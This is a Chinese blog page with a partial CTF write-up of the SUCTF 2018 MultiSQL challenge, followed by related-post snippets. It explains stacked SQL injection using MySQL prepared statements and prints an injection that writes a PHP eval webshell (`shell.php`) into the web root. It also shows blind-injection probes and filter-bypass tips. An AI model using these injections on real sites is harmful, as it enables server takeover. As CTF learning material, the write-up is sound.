[SUCTF 2018]MultiSQL(mysql预编译)

最新推荐文章于 2025-01-25 23:21:56 发布
原创 最新推荐文章于 2025-01-25 23:21:56 发布 · 475 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习

本文探讨了在面对数据库注入问题时,如何巧妙利用MySQL的预处理技术,通过堆叠注入获取shell,并介绍了几种编码方法,如16进制和字符函数。重点在于实践操作和技巧分享。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这个上传点不知道怎么利用,但是在用户信息这里存在注入
在这里插入图片描述
过滤的有点多,substr被过滤,可以用mid
在这里插入图片描述
后面越做越迷糊,还是太菜了

----------------参考WP--------------

知道了flag 不在数据库中,反倒是利用存在的堆叠注入去getshell,然后读文件

这里题目叫multi sql,根据wp 来看是做了预编译处理

-----------MySQL预处理技术----------

这道题做的有点迷糊,先做个记录再复习

select * from sc where cno=1;set @a='select 1,2,3';prepare test from @a;execute test ;
在这里插入图片描述

这道题就是用这种方法写shell

select hex("select '<?php eval($_POST[cmd]);?>' into outfile '/var/www/html/favicon/shell.php';"
最低0.47元/天 解锁文章
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1164
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 367
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理的sql
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 874
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
[SUCTF 2018]MultiSQL
qq_45691294的博客
10-10 1527
打开题目,是一个页面,只有登录 注册功能可以正常使用 先注册一个账号,注册后自动登录,登录之后看到 在用户信息处可以查看到自己的信息 编辑头像处可以上传头像图片,可能存在文件上传漏洞 前端对文件后缀名进行了过滤,但是上传php文件,存入的依旧是图片文件 那再看看刚才的查看信息的页面,发现url如下 http://e0063ae7-b2ce-42cd-bf4b-9341c0e87bf9.node3.buuoj.cn/user/user.php?id=2 将id的参数改为1 存在越权,也可能存在SQL
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 352
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()
一文搞懂MySQL预编译
09-08
MySQL预编译是一种提高数据库操作效率的技术,尤其在处理大量重复SQL语句时效果显著。预编译的主要目的是减少语法检查和编译的开销,从而提升数据库的性能。本文将深入探讨MySQL预编译的概念、好处、执行过程以及...
MySQL预编译功能
04-07
MySQL 预编译功能 MySQL 预编译功能是指在执行 SQL 语句之前,对 SQL 语句进行编译和优化,以提高执行效率。在 MySQL 中,预编译功能可以通过使用 Prepare 语句来实现。 预编译功能的优点是可以减少 SQL 语句的...
MySql优化-预编译和批处理(详解举例)
Pinker_Q
09-25 2318
文章目录预编译预编译的好处MySQL界面执行预编译JDBC驱动执行预编译使用Statement执行预编译(了解)使用PreparedStatement执行预编译(重点掌握)未开启预编译打开预编译功能打开缓存功能注意批处理Statement批处理(了解)PreparedStatement批处理打开批处理 预编译 预编译的好处 PreparedStatement接口有预编译功能。什么是预编译功能呢?它有什么好处呢? 当客户发送一条SQL语句给服务器后,服务器总是需要校验SQL语句的语法格式是否正确,然后把SQ
MySQL预编译语句的转义探究
9ian1i
04-24 2896
0x00 什么是预编译语句SQL语句,说到底也是一种类似于编程语言的东西,目的是让程序员更友好的操纵数据库,既然这样,它肯定也存在一个SQL语句的编译过程,将其转化为数据库所能执行的命令。顾名思义,预编译语句就是将需要执行SQL语句预先进行编译后缓存起来,下次使用的时候直接越过了编译这步,理论上是会比普通的SQL查询拥有更好的性能。我这里的重点不是关注它的性能,而是大家都说,预编译可以防止SQL注入
BUUCTF:[SUCTF 2018]MultiSQL
末初 · mochu7
04-01 2823
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 606
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL的预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
[SUCTF 2018]MultiSQL1
最新发布
2401_86760082的博客
01-25 755
原本以为是简单的数字型注入,看到大佬说,结果flag不在数据库当中,需要利用注入getshell,链接如下,跟着大佬的方法试一试。通过burp suite的intruder模块进行关键字爆破,看看过滤了哪些关键字。id=1 and 1=1,和?id=1 and 1=2,判断为数字型注入。发现可能注入点只有登录和注册,那么我们先注册一个用户,发现跳转到了。构造payload。查看shell,再利用post传参。可以利用这个工具转换为十进制。查看用户信息,发现有传参。
[SUCTF 2018]MultiSQL MYSQL 预处理写
m0_64180167的博客
12-13 943
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习过预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-11 745
flag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503}删删改改四五回,哥们只是想混个勋章,太折磨人了,看到我文章有罗里吧嗦的地方见谅,我其他文章都是以精简为主,不在乎文章分数,为了这个勋章,我只好车轱辘话转来转去(这一段就是这个作用)可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 523
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
80,【4】BUUCTF WEB [SUCTF 2018]MultiSQL
2402_87039650的博客
01-25 874
上面这个链接是我第一次接触二次注入这道题也涉及了对二次注入不熟悉的可以看看BUUCTF出了点问题,打不开,以下面这两篇wp作为学习对象第一篇前面的1到3步做过了,从第4步开始学习作者所说的越权访问准确来说属于越权访问中的水平越权所给的条件表达上涉及以下知识user()
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值